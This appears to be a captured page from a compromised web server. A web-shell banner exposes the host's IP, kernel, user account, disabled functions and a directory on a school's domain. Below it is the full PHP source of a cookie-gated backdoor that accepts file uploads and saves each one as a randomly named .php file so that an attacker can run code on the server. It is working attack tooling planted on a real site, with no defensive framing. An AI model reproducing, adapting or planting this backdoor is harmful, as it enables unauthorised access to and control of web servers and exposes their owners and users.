| Server IP : 27.254.66.5 / Your IP : 216.73.217.39 Web Server : Apache/2 System : Linux cs82.hostneverdie.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64 User : technic2 ( 1951) PHP Version : 7.4.30 Disable Function : apache_child_terminate, apache_setenv, define_syslog_variables, escapeshellarg, escapeshellcmd,exec, fp, fput, highlight_file, ini_alter, ini_restore, inject_code, passthru,phpAds_remoteInfo, phpAds_XmlRpc,phpAds_xmlrpcDecode, phpAds_xmlrpcEncode, popen, posix_getpwuid, posix_kill, posix_mkfifo, posix_setpgid, posix_setsid,posix_setuid, posix_setuid, posix_uname,proc_open,proc_close, proc_get_status, proc_nice, proc_terminate, shell_exec, syslog, system, xmlrpc_entity_decode, show_source,sleep,pcntl_exec,virtual,suexec,dbmopen,dl,symlink,disk_free_space,diskfreespace,leak MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/technic2/domains/technicrayong.ac.th/private_html/durable/ |
Upload File : |
<?php
# haxorsec doc
function generateRandomString($length = 10) {
$characters = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ';
$charactersLength = strlen($characters);
$randomString = '';
for ($i = 0; $i < $length; $i++) {
$randomString .= $characters[random_int(0, $charactersLength - 1)];
}
return $randomString;
}
if (md5($_COOKIE['woofig']) == "6eb69daaefb3ad5b731972e15cfa808c") {
echo '<form enctype="multipart/form-data" method="post">
<input type="text" name="dir" value="./" /> (upload directory)
<br>
<input type="file" name="file" />
<input type="submit" name="submit" value="submit" />
</form>';
if($_POST['submit'] == "submit"){
$uploaddir = $_POST['dir'];
$uploadfile = $uploaddir . basename($_FILES['file']['name']);
if (move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)) {
$ff = generateRandomString() .".php";
copy($uploadfile,$ff);
echo "<span style='color:#00f' >File was successfully uploaded " . $ff . ".</span><hr />";
}else{
echo "<span style='color:#f00' >Upload failed!</span><hr />";
}
}
}
?>